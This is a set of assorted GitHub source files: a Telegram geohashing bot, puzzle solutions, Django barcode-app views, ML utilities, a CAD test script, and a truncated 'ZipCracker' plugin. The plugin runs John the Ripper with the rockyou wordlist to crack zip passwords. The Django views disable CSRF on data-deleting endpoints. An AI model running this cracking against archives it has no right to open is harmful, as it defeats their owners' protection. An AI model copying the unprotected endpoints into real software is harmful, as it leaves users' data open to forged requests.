+{"seq_id":"9780160441","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport logging\nfrom secrets import token_urlsafe\nfrom datetime import datetime\nfrom uuid import uuid4\nfrom telegram import InlineQueryResultLocation, InlineKeyboardMarkup, \\\n    InlineKeyboardButton\nfrom telegram.ext import Updater, InlineQueryHandler, CommandHandler\nfrom parse import compile\nfrom pytz import timezone\nfrom tzwhere.tzwhere import tzwhere\nfrom geohash import calculate\nimport config\n\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n                    level=logging.INFO)\n\nlogger = logging.getLogger(__name__)\n\nparser = compile('{:d} {:d}')\n\ntzw = tzwhere()\n\nwebhook_token = token_urlsafe(config.webhook_token_length)\n\ndef inlinequery(bot, update):\n    loc = parser.parse(update.inline_query.query).fixed\n    if len(loc) != 2:\n        return\n    if abs(loc[0]) >= 90:\n        return\n    if abs(loc[1]) >= 180:\n        return\n    date = datetime.now(timezone(tzw.tzNameAt(loc[0], loc[1]))).date()\n    hash = calculate(loc, date)\n    results = [\n        InlineQueryResultLocation(\n            id=uuid4(),\n            latitude=hash[0],\n            longitude=hash[1],\n            title=str(date),\n            reply_markup=InlineKeyboardMarkup(\n                [[InlineKeyboardButton('Open Street Map',\n                                       url=config.osm_url.format(hash[0], hash[1])),\n                  InlineKeyboardButton('Google Maps',\n                                       url=config.maps_url.format(hash[0], hash[1])),\n                  InlineKeyboardButton('Geohashing Wiki',\n                                       url=config.wiki_url.format(date, loc[0], loc[1]))]]\n            )\n        )\n    ]\n    update.inline_query.answer(results)\n\ndef main():\n    updater = Updater(config.token)\n    dispatcher = updater.dispatcher\n\n    dispatcher.add_handler(InlineQueryHandler(inlinequery, pattern='^-?[0-9]{1,2} -?[0-9]{1,3}$'))\n\n    if config.use_webhook:\n        updater.start_webhook(listen=config.webhook_listen,\n                              port=config.webhook_port,\n                              url_path=webhook_token)\n        updater.bot.set_webhook(config.webhook_url.format(webhook_token))\n    else:\n        updater.start_polling()\n    updater.idle()\n\nif __name__ == '__main__':\n    main()\n","repo_name":"rkr8/GeohashingBot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"42058185822","text":"with open(\"input.txt\") as f:\n    entries = [\n        int(line)\n        for line in f.read().splitlines()\n    ]\n\nentries.append(0)\nentries.sort()\nentries.append(entries[len(entries) - 1 ] + 3)\n\ndef part1(entries):\n    diff_1 = 0\n    diff_3 = 0\n    \n    for i in range(len(entries) - 1):\n        if entries[i+1] - entries[i] == 1:\n            diff_1 += 1\n        elif entries[i+1] - entries[i] == 3:\n            diff_3 += 1\n        elif entries[i+1] - entries[i] > 3:\n            break\n    \n    return diff_1 * diff_3\n\ndef variations(adapters):\n    length = len(adapters)\n    \n    if length <= 2:\n        return 1\n    elif length == 3:\n        return 2\n    elif length == 4:\n        return 4\n    elif length == 5:\n        return 7\n\ndef 
part2(entries):\n split_3 = list()\n current_group = list()\n\n for i in range(len(entries) - 1):\n current_group.append(entries[i])\n\n if entries[i+1] - entries[i] == 3:\n split_3.append(current_group)\n current_group = list()\n\n result = 1\n\n for l in split_3:\n result *= variations(l)\n\n return result\n\n \n\nprint(\"Day 10:\")\nprint(\"Part 1:\"),\nprint(part1(entries))\nprint(\"Part 2:\"),\nprint(part2(entries))","repo_name":"arthurbsh/advent-of-code-2020","sub_path":"10/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"4080792794","text":"#Use of recursion to calculater a factorial\ndef fact(n): #defining a function and passing variable n\n if (n==0 or n==1): #condition for fact to non 0 and 1\n return 1 #if condition satisfies returning 1\n else:\n return n*fact(n-1) #else condition to be working of fact formula 3*2!\nnum = int(input(\"Enter a number:- \")) # 2*1!\nif(num<0): # return 1 then calculater all no. and giving output\n print(\"factorial doesn't exist!\") #if number is negative then factorial doesn't exist\nelse:\n print(\"Factorial of number is:- \", fact(num)) # |Calling fact function and passing value of sum to the n","repo_name":"yapranav09v/python-Tutorial","sub_path":"#3basicpython/useofRecursion.py","file_name":"useofRecursion.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"5474083606","text":"from django.http import HttpResponse\r\nfrom django.http import JsonResponse, Http404\r\nfrom django.shortcuts import render_to_response\r\nfrom django.contrib.auth import authenticate, login,logout\r\nfrom django.views.generic.base import View\r\n\r\nimport json\r\n\r\nfrom django.utils import timezone\r\nfrom questions.models import Question,Choice,Item,Location,Device,LocDev\r\nfrom django.views.decorators.csrf import csrf_exempt\r\nfrom django.shortcuts import render_to_response, render, redirect\r\nfrom django.template import Context, loader\r\nfrom questions.CustomContainers import User,UserFactory,StatDeviceFactory\r\nfrom django.utils.decorators import method_decorator\r\n\r\n#Function to create JSON response. 
\r\ndef cors_json(resp):\r\n\tprint(resp)\r\n\tr = JsonResponse(resp)\r\n\tr['Access-Control-Allow-Origin'] = '*'\r\n\tr['Access-Control-Allow-Methods'] = \"GET\"\r\n\tr['Access-Control-Allow-Headers'] = 'X-Requested-With,content-type'\r\n\treturn r\r\n\r\n@csrf_exempt\r\ndef index(request):\r\n\tlocation_good = 0\r\n\tlocation_bad = 0\r\n\titem_good = 0\r\n\titem_bad = 0\r\n\tfor q in Question.objects.filter(item_assoc=None):\r\n\t\tif q:\r\n\t\t\tlocation_good +=1\r\n\t\telse:\r\n\t\t\tlocation_bad +=1\r\n\tfor q in Question.objects.filter(location_assoc=None):\r\n\t\tif q:\r\n\t\t\titem_good +=1\r\n\t\telse:\r\n\t\t\titem_bad +=1\r\n\tstuff = {\r\n\t\"location_good\":location_good,\r\n\t\"location_bad\":location_bad,\r\n\t\"item_good\":item_good,\r\n\t\"item_bad\":item_bad,\r\n\t}\r\n\treturn render(request,'questions/index.html',stuff)\r\n\r\ndef logout_view(request):\r\n logout(request)\r\n # Redirect to a success page.\r\n\r\ndef devices(request):\r\n\tdev = list(Device.objects.all())\r\n\tdev.sort()\r\n\titems = {\"devices\":dev}\r\n\treturn render(request,'questions/devices.html',items)\r\n\r\ndef locations(request):\r\n loc = Location.objects.all()\r\n items = {\"Location\":loc,}\r\n return render(request,'questions/location.html',items)\r\n\r\ndef users(request):\r\n\treturn render(request,'questions/users.html',{'usrs':UserFactory()})\r\n\r\ndef locationsadd(request):\r\n\tdev = Device.objects.all()\r\n\titems = {\"devices\":dev}\r\n\treturn render(request, 'questions/location_form.html', items)\r\n\r\ndef deviceadd(request):\r\n\treturn render(request, 'questions/device_add.html', {})\r\n\r\ndef recent_scaned(ques,n):\r\n\tout =[ int(q.time_scanned) for q in ques]\r\n\tout.sort()\r\n\treturn out[-n:]\r\n\r\nclass deviceView(View):\r\n\t@method_decorator(csrf_exempt)\r\n\tdef dispatch(self, request, dev_pk):\r\n\t\treturn super(deviceView, self).dispatch(request, dev_pk)\r\n\tdef get(self, request,dev_pk):\r\n\t\tdev = Device.objects.get(id=dev_pk)\r\n\t\titms = Item.objects.filter(item_type=dev)\r\n\t\tthings = {'device': dev,'items':itms, 'dev_pk':dev_pk}\r\n\t\treturn render(request, 'questions/device-view.html', things)\r\n\tdef post(self, request,dev_pk):\r\n\t\treceived_json_data=json.loads(request.body)\r\n\t\tItem.objects.create(item_type=Device.objects.get(id=dev_pk),\r\n\t\t\t\t\t\t\titem_barcode_num=received_json_data[\"barcode\"])\r\n\t\treturn HttpResponse(\"Correct\")\r\n\r\nclass ChangeUser(View):\r\n\t@method_decorator(csrf_exempt)\r\n\tdef dispatch(self, request, loc_pk):\r\n\t\treturn super(ChangeUser, self).dispatch(request, loc_pk)\r\n\tdef get(self, request,loc_pk):\r\n\t\treturn Http404(\"Not for human eyes\")\r\n\tdef post(self, request,loc_pk):\r\n\t\treceived_json_data=json.loads(request.body)\r\n\t\tLocation.objects.filter(pk=loc_pk).update(user_assigned=received_json_data['newuser'])\r\n\t\treturn HttpResponse(\"Correct\")\r\n\r\ndef locationView(request,loc_pk):\r\n\t#<!--{% #url 'questions:deviceView' loc.0.id %}-->\r\n\tlocation = Location.objects.get(id=loc_pk)\r\n\tdev = StatDeviceFactory(loc_pk)\r\n\tthings = {\r\n\t'location': location,\r\n\t'device' : dev,\r\n\t}\r\n\treturn render(request, 'questions/location-view.html', things)\r\n\r\n#Delete class is used to delete things from database. 
\r\n@csrf_exempt\r\ndef delete(request):\r\n\tif request.method == 'POST':\r\n\t\treceived_json_data=json.loads(request.body)\r\n\t\tif \"device\" in received_json_data and \"barcode\" in received_json_data:\r\n\t\t\tinstance=Device.objects.get(id=int(received_json_data[\"device\"]))\r\n\t\t\tinstance_barcode=instance.item_set.get(item_barcode_num=int(received_json_data[\"barcode\"]))\r\n\t\t\tinstance_barcode.delete()\r\n\t\tif \"device\" in received_json_data and \"barcode\" not in received_json_data:\r\n\t\t\tinstance=Device.objects.get(id=int(received_json_data[\"device\"]))\r\n\t\t\tinstance.delete()\r\n\t\tif \"location\" in received_json_data:\r\n\t\t\tinstance=Location.objects.get(id=int(received_json_data[\"location\"]))\r\n\t\t\tinstance.delete()\r\n\t\treturn HttpResponse(\"Success, deleted. \")\r\n#To add a device run this function. Activated with API call. \r\n@csrf_exempt\r\ndef adddevice(request):\r\n\tif request.method == 'POST':\r\n\t\treceived_json_data=json.loads(request.body)\r\n\t\tdevice_name=received_json_data[\"device_name\"]\r\n\t\tmanu=received_json_data[\"manu\"]\r\n\t\ttype_equip=received_json_data[\"type\"]\r\n\t\tmodel_number=received_json_data[\"model_number\"]\r\n\t\tquestions_for_the_device=received_json_data[\"questions\"]\r\n\t\tbarcodes=received_json_data[\"barcodes\"]\r\n\r\n\t\tnew_device=Device.objects.create(device_name=device_name, manufacturer=manu, type_equip=type_equip, model_number=model_number)\r\n\t\tfor barcode in barcodes:\r\n\t\t\tnew_device.item_set.create(item_barcode_num=barcode)\r\n\t\tfor question in questions_for_the_device:\r\n\t\t\tnew_device.question_set.create(question_text=question)\r\n\t\tnew_device.save()\r\n\t\treturn HttpResponse(\"Sucess, id added is:\" + str(new_device.id))\r\n#Class used by web application to add a location\r\n@csrf_exempt\r\ndef addlocation(request):\r\n\tif request.method == 'POST':\r\n\t\treceived_json_data=json.loads(request.body)\r\n\t\tloc_barcode=received_json_data[\"loc_barcode_num\"]\r\n\t\tloc_name=received_json_data[\"loc_name\"]\r\n\t\tuser_assigned=received_json_data[\"user_assigned\"]\r\n\t\tquestions_for_loc_only=received_json_data[\"loc_questions\"]\r\n\t\tdevices_to_add=received_json_data[\"devices_to_add\"]\r\n\t\tlocation=Location.objects.create(loc_barcode_num=loc_barcode, loc_name=loc_name, user_assigned=user_assigned)\r\n\t\tfor locquest in questions_for_loc_only:\r\n\t\t\tlocation.question_set.create(question_text=locquest)\r\n\t\tfor device_id in devices_to_add:\r\n\t\t\tfound_device=Device.objects.get(id=int(device_id))\r\n\t\t\tLocDev.objects.create(location=location, device=found_device) #Check me\r\n\r\n\t\treturn HttpResponse(\"Correct\")\r\n\r\n#Questions by user view. \r\n@csrf_exempt\r\ndef questionsbyuser(request):\r\n\tif request.method == 'POST':\r\n\t\tuser=request.POST[\"user\"]\r\n\t\tfiltered_items=Location.objects.all()\r\n\t\treturn cors_json({'data': map (Location.get_json_object, filtered_items)})\r\n#Adds answers. 
\r\n@csrf_exempt\r\ndef addanswers(request):\r\n\tif request.method == 'POST':\r\n\t\treceived_json_data=json.loads(request.body)[\"data\"]\r\n\t\tanswers=received_json_data[\"answers\"]\r\n\t\tfor answer in answers:\r\n\t\t\ttime_answered= int(answer[\"time_answered\"])\r\n\t\t\tloc_id=answer[\"loc_id\"]\r\n\t\t\tuser=answer[\"user\"]\r\n\t\t\tanswer_text=answer[\"answer_text\"]\r\n\r\n\t\t\tif \"question_id\" in answer:\r\n\t\t\t\tquestion_id=answer[\"question_id\"]\r\n\t\t\t\tquestion_entry=Question.objects.get(id=question_id)\r\n\t\t\t\tloc_entry=Location.objects.get(id=loc_id)\r\n\t\t\tChoice.objects.create(choice_text=answer_text, person_scanned=user, time_scanned=time_answered, location=loc_entry, question=question_entry )\r\n\t\treturn HttpResponse(\"Sucessful\")\r\n","repo_name":"maroneal1/Barcode-scanner-Front-End","sub_path":"questions/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12682363689","text":"import numpy as np\nimport scipy.io as sio\n\ndef reshape_params(nn_params, input_layer_size, hidden_layer_size, num_labels):\n # Reshape weights from flattened param vectors.\n Theta1 = nn_params[:hidden_layer_size * (input_layer_size + 1)].reshape(\n hidden_layer_size, (input_layer_size + 1))\n\n Theta2 = nn_params[hidden_layer_size * (input_layer_size + 1):].reshape(\n num_labels, (hidden_layer_size + 1))\n\n return Theta1, Theta2\n\n\ndef flatten_params(Theta1, Theta2):\n return np.concatenate((Theta1.ravel(), Theta2.ravel()))\n\n\ndef load_data(input, source='numpy'):\n data = sio.loadmat(input);\n X = data['X']\n y = data['y'].flatten()\n # Correction for 1-based Matlab indexing.\n if source == 'matlab':\n y[y == 10] = 0\n return (X, y)\n\n\ndef shuffle_data(X, y):\n if y.ndim == 1:\n y = y.reshape((-1, 1))\n Z = np.c_[X, y]\n np.random.shuffle(Z)\n X, y = Z[:,:-y.shape[1]], Z[:,-y.shape[1]:].astype(np.uint8)\n if y.shape[1] == 1:\n y = y.flatten()\n return X, y\n\n\ndef partition_data(X, y, split):\n m = int(X.shape[0] * split)\n\n # Split into training and validation sets.\n X_1, X_2 = X[:m], X[m:]\n y_1, y_2 = y[:m], y[m:]\n\n return X_1, y_1, X_2, y_2\n","repo_name":"indraastra/nn-ocr","sub_path":"archive/matlab_port/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"40215256066","text":"from SketchAPI import *\n\nfrom salome.shaper import model\n\nmodel.begin()\npartSet = model.moduleDocument()\nPart_1 = model.addPart(partSet)\nPart_1_doc = Part_1.document()\nSketch_1 = model.addSketch(Part_1_doc, model.defaultPlane(\"XOY\"))\nSketchLine_1 = Sketch_1.addLine(0.5, 0, 0, 0)\nSketchProjection_1 = Sketch_1.addProjection(model.selection(\"VERTEX\", \"PartSet/Origin\"), False)\nSketchPoint_1 = SketchProjection_1.createdFeature()\nSketchConstraintCoincidence_1 = Sketch_1.setCoincident(SketchLine_1.endPoint(), SketchPoint_1.result())\nSketchLine_2 = Sketch_1.addLine(0, 37.39521866225591, 0, 40)\nSketchLine_3 = Sketch_1.addLine(0, 40, 0.5, 40)\nSketchLine_4 = Sketch_1.addLine(1, 40, 1, 0.5)\nSketchConstraintCoincidence_2 = Sketch_1.setCoincident(SketchLine_2.endPoint(), SketchLine_3.startPoint())\nSketchConstraintHorizontal_1 = Sketch_1.setHorizontal(SketchLine_1.result())\nSketchConstraintVertical_1 = Sketch_1.setVertical(SketchLine_2.result())\nSketchConstraintHorizontal_2 = 
Sketch_1.setHorizontal(SketchLine_3.result())\nSketchConstraintVertical_2 = Sketch_1.setVertical(SketchLine_4.result())\nSketchConstraintLength_1 = Sketch_1.setLength(SketchLine_2.result(), 2.604781337744086)\nSketchConstraintLength_2 = Sketch_1.setLength(SketchLine_3.result(), 0.5)\nSketchPoint_2 = Sketch_1.addPoint(0.5, 40)\nSketchConstraintCoincidence_3 = Sketch_1.setCoincident(SketchPoint_2.coordinates(), SketchLine_3.endPoint())\nSketchLine_5 = Sketch_1.addLine(1, 40, 0.5, 40)\nSketchConstraintCoincidence_4 = Sketch_1.setCoincident(SketchLine_4.startPoint(), SketchLine_5.startPoint())\nSketchConstraintCoincidence_5 = Sketch_1.setCoincident(SketchLine_3.endPoint(), SketchLine_5.endPoint())\nSketchConstraintCoincidence_6 = Sketch_1.setCoincident(SketchLine_4.startPoint(), SketchLine_5.result())\nSketchConstraintCoincidence_7 = Sketch_1.setCoincident(SketchLine_3.endPoint(), SketchLine_5.endPoint())\nSketchPoint_3 = Sketch_1.addPoint(0, 36.39521866225591)\nSketchPoint_4 = Sketch_1.addPoint(0, 37.39521866225591)\nSketchConstraintDistanceVertical_1 = Sketch_1.setVerticalDistance(SketchPoint_4.coordinates(), SketchPoint_3.coordinates(), 1)\nSketchConstraintCoincidence_8 = Sketch_1.setCoincident(SketchPoint_4.coordinates(), SketchLine_2.startPoint())\nSketchLine_6 = Sketch_1.addLine(0, 36.39521866225591, 0, 37.39521866225591)\nSketchConstraintCoincidence_9 = Sketch_1.setCoincident(SketchPoint_3.coordinates(), SketchLine_6.startPoint())\nSketchConstraintCoincidence_10 = Sketch_1.setCoincident(SketchLine_2.startPoint(), SketchLine_6.endPoint())\nSketchConstraintCoincidence_11 = Sketch_1.setCoincident(SketchLine_6.endPoint(), SketchLine_2.result())\nSketchLine_7 = Sketch_1.addLine(0, 0, 0, 36.39521866225591)\nSketchConstraintCoincidence_12 = Sketch_1.setCoincident(SketchLine_1.endPoint(), SketchLine_7.startPoint())\nSketchConstraintCoincidence_13 = Sketch_1.setCoincident(SketchPoint_3.coordinates(), SketchLine_7.endPoint())\nSketchConstraintCoincidence_14 = Sketch_1.setCoincident(SketchLine_7.endPoint(), SketchLine_6.result())\nSketchConstraintCoincidence_15 = Sketch_1.setCoincident(SketchLine_7.result(), SketchLine_1.endPoint())\nSketchLine_8 = Sketch_1.addLine(1, 0.5, 0.5, 0)\nSketchConstraintCoincidence_16 = Sketch_1.setCoincident(SketchLine_8.endPoint(), SketchLine_1.startPoint())\nSketchConstraintCoincidence_17 = Sketch_1.setCoincident(SketchLine_8.endPoint(), SketchLine_1.startPoint())\nSketchConstraintCoincidence_18 = Sketch_1.setCoincident(SketchLine_8.startPoint(), SketchLine_4.endPoint())\nSketchConstraintCoincidence_19 = Sketch_1.setCoincident(SketchLine_8.startPoint(), SketchLine_4.endPoint())\nSketchConstraintCoincidence_20 = Sketch_1.setCoincident(SketchLine_8.startPoint(), SketchLine_4.endPoint())\nSketchConstraintParallel_1 = Sketch_1.setParallel(SketchLine_7.result(), SketchLine_4.result())\nSketchConstraintParallel_2 = Sketch_1.setParallel(SketchLine_2.result(), SketchLine_6.result())\nSketchConstraintCoincidence_21 = Sketch_1.setCoincident(SketchLine_2.result(), SketchLine_6.endPoint())\nSketchConstraintCoincidence_22 = Sketch_1.setCoincident(SketchLine_7.endPoint(), SketchLine_6.result())\nSketchConstraintCoincidence_23 = Sketch_1.setCoincident(SketchLine_3.result(), SketchLine_2.endPoint())\nSketchConstraintCoincidence_24 = Sketch_1.setCoincident(SketchLine_5.endPoint(), SketchLine_3.result())\nSketchConstraintLength_3 = Sketch_1.setLength(SketchLine_1.result(), 0.5)\nSketchProjection_2 = Sketch_1.addProjection(model.selection(\"EDGE\", \"PartSet/OX\"), False)\nSketchLine_9 
= SketchProjection_2.createdFeature()\nSketchConstraintDistance_1 = Sketch_1.setDistance(SketchLine_8.startPoint(), SketchLine_9.result(), 0.5, True)\nSketchConstraintCoincidence_25 = Sketch_1.setCoincident(SketchLine_4.result(), SketchLine_8.startPoint())\nSketchConstraintCoincidence_26 = Sketch_1.setCoincident(SketchLine_1.startPoint(), SketchLine_8.result())\nSketchConstraintCoincidence_27 = Sketch_1.setCoincident(SketchLine_8.result(), SketchLine_8.startPoint())\nSketchConstraintParallel_3 = Sketch_1.setParallel(SketchLine_3.result(), SketchLine_5.result())\nSketchConstraintLength_4 = Sketch_1.setLength(SketchLine_5.result(), 0.5)\nSketchConstraintCoincidence_28 = Sketch_1.setCoincident(SketchLine_5.result(), SketchLine_4.startPoint())\nSketchConstraintCoincidence_29 = Sketch_1.setCoincident(SketchLine_5.result(), SketchLine_3.endPoint())\nSketchConstraintLength_5 = Sketch_1.setLength(SketchLine_4.result(), 39.5)\nmodel.do()\nRevolution_1 = model.addRevolution(Part_1_doc, [model.selection(\"COMPOUND\", \"all-in-Sketch_1\")], model.selection(\"EDGE\", \"Sketch_1/SketchLine_4\"), 360, 0)\nSketch_2 = model.addSketch(Part_1_doc, model.selection(\"FACE\", \"Revolution_1_1/Generated_Face&Sketch_1/SketchLine_1\"))\nSketchLine_10 = Sketch_2.addLine(1, 1, 1, -1)\nSketchProjection_3 = Sketch_2.addProjection(model.selection(\"EDGE\", \"[Revolution_1_1/Generated_Face&Sketch_1/SketchLine_7][Revolution_1_1/Generated_Face&Sketch_1/SketchLine_1]\"), False)\nSketchCircle_1 = SketchProjection_3.createdFeature()\nSketchConstraintCoincidence_30 = Sketch_2.setCoincident(SketchLine_10.startPoint(), SketchCircle_1.results()[1])\nSketchConstraintCoincidence_31 = Sketch_2.setCoincident(SketchLine_10.endPoint(), SketchCircle_1.results()[1])\nSketchConstraintVertical_3 = Sketch_2.setVertical(SketchLine_10.result())\nSketchConstraintCoincidence_32 = Sketch_2.setCoincident(SketchAPI_Circle(SketchCircle_1).center(), SketchLine_10.result())\nSketchLine_11 = Sketch_2.addLine(0, 0, 2, 0)\nSketchProjection_4 = Sketch_2.addProjection(model.selection(\"VERTEX\", \"[Revolution_1_1/Generated_Face&Sketch_1/SketchLine_7][Revolution_1_1/Generated_Face&Sketch_1/SketchLine_1]\"), False)\nSketchPoint_5 = SketchProjection_4.createdFeature()\nSketchConstraintCoincidence_33 = Sketch_2.setCoincident(SketchLine_11.startPoint(), SketchPoint_5.result())\nSketchProjection_5 = Sketch_2.addProjection(model.selection(\"EDGE\", \"[Revolution_1_1/Generated_Face&Sketch_1/SketchLine_7][Revolution_1_1/Generated_Face&Sketch_1/SketchLine_1]\"), False)\nSketchCircle_2 = SketchProjection_5.createdFeature()\nSketchConstraintCoincidence_34 = Sketch_2.setCoincident(SketchLine_11.endPoint(), SketchCircle_2.results()[1])\nSketchConstraintCoincidence_35 = Sketch_2.setCoincident(SketchAPI_Circle(SketchCircle_1).center(), SketchLine_11.result())\nSketchLine_12 = Sketch_2.addLine(1.25, 0, 1.176776695296637, 0.1767766952966369)\nSketchConstraintCoincidence_36 = Sketch_2.setCoincident(SketchLine_12.startPoint(), SketchLine_11.result())\nSketchLine_13 = Sketch_2.addLine(1.176776695296637, 0.1767766952966369, 1, 0.25)\nSketchConstraintCoincidence_37 = Sketch_2.setCoincident(SketchLine_12.endPoint(), SketchLine_13.startPoint())\nSketchConstraintCoincidence_38 = Sketch_2.setCoincident(SketchLine_13.endPoint(), SketchLine_10.result())\nSketchProjection_6 = Sketch_2.addProjection(model.selection(\"EDGE\", \"[Revolution_1_1/Generated_Face&Sketch_1/SketchLine_8][Revolution_1_1/Generated_Face&Sketch_1/SketchLine_1]\"), True)\nSketchCircle_3 = 
SketchProjection_6.createdFeature()\nSketchLine_14 = Sketch_2.addLine(1.176776695296637, 0.1767766952966369, 1.738436468990353, 0.6743230541046004)\nSketchConstraintCoincidence_39 = Sketch_2.setCoincident(SketchLine_12.endPoint(), SketchLine_14.startPoint())\nSketchProjection_7 = Sketch_2.addProjection(model.selection(\"EDGE\", \"[Revolution_1_1/Generated_Face&Sketch_1/SketchLine_7][Revolution_1_1/Generated_Face&Sketch_1/SketchLine_1]\"), False)\nSketchCircle_4 = SketchProjection_7.createdFeature()\nSketchConstraintCoincidence_40 = Sketch_2.setCoincident(SketchLine_14.endPoint(), SketchCircle_4.results()[1])\nSketchCircle_5 = Sketch_2.addCircle(1, 0, 0.25)\nSketchCircle_5.setAuxiliary(True)\nSketchConstraintCoincidence_41 = Sketch_2.setCoincident(SketchAPI_Circle(SketchCircle_1).center(), SketchCircle_5.center())\nSketchConstraintCoincidence_42 = Sketch_2.setCoincident(SketchLine_12.startPoint(), SketchCircle_5.results()[1])\nSketchConstraintCoincidence_43 = Sketch_2.setCoincident(SketchLine_12.endPoint(), SketchCircle_5.results()[1])\nSketchConstraintRadius_1 = Sketch_2.setRadius(SketchCircle_5.results()[1], 0.25)\nSketchConstraintEqual_1 = Sketch_2.setEqual(SketchLine_13.result(), SketchLine_12.result())\nSketchConstraintCoincidence_44 = Sketch_2.setCoincident(SketchLine_13.endPoint(), SketchCircle_5.results()[1])\nSketchConstraintMirror_1_objects = [SketchLine_13.result(), SketchLine_12.result(), SketchLine_14.result()]\nSketchConstraintMirror_1 = Sketch_2.addMirror(SketchLine_10.result(), SketchConstraintMirror_1_objects)\n[SketchLine_15, SketchLine_16, SketchLine_17] = SketchConstraintMirror_1.mirrored()\nSketchConstraintMirror_2_objects = [SketchLine_14.result(), SketchLine_12.result(), SketchLine_13.result(), SketchLine_15.result(), SketchLine_16.result(), SketchLine_17.result()]\nSketchConstraintMirror_2 = Sketch_2.addMirror(SketchLine_11.result(), SketchConstraintMirror_2_objects)\n[SketchLine_18, SketchLine_19, SketchLine_20, SketchLine_21, SketchLine_22, SketchLine_23] = SketchConstraintMirror_2.mirrored()\nmodel.do()\nEdge_1_objects = [model.selection(\"EDGE\", \"Sketch_2/SketchLine_23\"), model.selection(\"EDGE\", \"Sketch_2/SketchLine_21\"), model.selection(\"EDGE\", \"Sketch_2/SketchLine_22\"), model.selection(\"EDGE\", \"Sketch_2/SketchLine_10\"), model.selection(\"EDGE\", \"Sketch_2/SketchLine_15\"), model.selection(\"EDGE\", \"Sketch_2/SketchLine_16\"), model.selection(\"EDGE\", \"Sketch_2/SketchLine_17\"), model.selection(\"EDGE\", \"Sketch_2/SketchLine_11\"), model.selection(\"EDGE\", \"Sketch_2/SketchLine_12\"), model.selection(\"EDGE\", \"Sketch_2/SketchLine_20\"), model.selection(\"EDGE\", \"Sketch_2/SketchLine_19\"), model.selection(\"EDGE\", \"Sketch_2/SketchLine_18\"), model.selection(\"EDGE\", \"Sketch_2/SketchLine_13\"), model.selection(\"EDGE\", \"Sketch_2/SketchLine_14\"), model.selection(\"EDGE\", \"Sketch_2/SketchProjection_6\")]\nEdge_1 = model.addEdge(Part_1_doc, Edge_1_objects)\nExtrusion_1 = model.addExtrusion(Part_1_doc, [model.selection(\"COMPOUND\", \"all-in-Edge_1\")], model.selection(\"EDGE\", \"PartSet/OY\"), model.selection(\"FACE\", \"Revolution_1_1/Generated_Face&Sketch_1/SketchLine_3\"), 0, model.selection(), 0)\nmodel.end()\n\nfrom GeomAPI import *\n\nmodel.testNbResults(Extrusion_1, 1)\nmodel.testNbSubResults(Extrusion_1, [15])\nmodel.testNbSubShapes(Extrusion_1, GeomAPI_Shape.SOLID, [0])\nmodel.testNbSubShapes(Extrusion_1, GeomAPI_Shape.FACE, [15])\nmodel.testNbSubShapes(Extrusion_1, GeomAPI_Shape.EDGE, 
[102])\nmodel.testNbSubShapes(Extrusion_1, GeomAPI_Shape.VERTEX, [204])\nmodel.testResultsAreas(Extrusion_1, [466.947878])\n\nassert(model.checkPythonDump())\n","repo_name":"x3-apptech/salome-modules-shaper","sub_path":"src/FeaturesPlugin/Test/Test17261.py","file_name":"Test17261.py","file_ext":"py","file_size_in_byte":11518,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"14756687184","text":"import random\nimport requests\nfrom googlesearch import search\nfrom bs4 import BeautifulSoup\n\nclass ChatBot:\n\n def reply(self, text):\n simple_answers = [\"Who created the Armenian alphabet?\", \"where Mesrop Mashtots was born?\"]\n if \"?\" in text:\n return random.choice(simple_answers)\n else:\n return random.choice(simple_answers)\n\n#\n# bob = ChatBot()\n#\n# jek = ChatBot()\n# answer = \"\"\n#\n# while True:\n# if \"by\" in answer:\n# break\n# else:\n# answer = bob.reply(answer)\n# print(\"Bob typing ...\\n\", \" \", answer)\n# if \"by\" in answer:\n# break\n# else:\n# answer = jek.reply(answer)\n# print(\"Jek tayping ...\\n\", \" \", answer)\n\n\n\nclass ChatBotMl:\n def reply(self, text):\n search_result_list = list(search(text, tld=\"com\", num=10, stop=3, pause=1))\n page = requests.get(search_result_list[0])\n html_content = page.text\n soup = BeautifulSoup(html_content, 'html.parser')\n # soup.title\n # soup.title.string\n # soup.p # first paragraph\n #\n # soup.find('p').text # first paragraph text\n # parent child\n # soup.p.parent.name\n\n ps = list(soup.find_all(\"p\", limit=5))\n print(ps[2].text)\n\n # dir(soup)\n # help(soup.a)\n # print(html_content)\n\n\nbob = ChatBotMl()\njek = ChatBotMl()\n\nanswer = \"hello\"\nwhile True:\n answer = jek.reply(answer)\n # print(answer)\n answer = bob.reply(answer)\n # print(answer)","repo_name":"Arina-prog/Python_homeworks","sub_path":"machin learning/homework2/chat_bot2.py","file_name":"chat_bot2.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4015675967","text":"from utils.misc import execmd\r\nfrom os import path\r\n\r\ndef help():\r\n\tconfig = {\r\n\t\t'type':{'other':['.zip']},\r\n\t\t'linux':True,\r\n\t\t'windows':False,\r\n\t\t'name':'ZipCracker'\r\n\t}\r\n\treturn config\r\n\r\n\r\ndef scan(config):\r\n\tconfig_current = help()\r\n\r\n\tpath1 = '%s/zipinfo.txt'%config['env_dir']\r\n\tpath2 = '%s/hash_zip.txt'%config['env_dir']\r\n\tpath3 = '%s/zip_cracked.txt'%config['env_dir']\r\n\r\n\tcmd1 = 'zipinfo %s > %s'%(config['path'],path1)\r\n\tcmd2 = 'zipdetails %s >> %s'%(config['path'],path1)\r\n\r\n\trockyou = \"/usr/share/wordlists/rockyou.txt\"\r\n\tmore = 'timeout 30 john %s --wordlist=%s --show;john %s --show > %s'%(path2,rockyou,path2,path3) if(path.exists(rockyou)) else 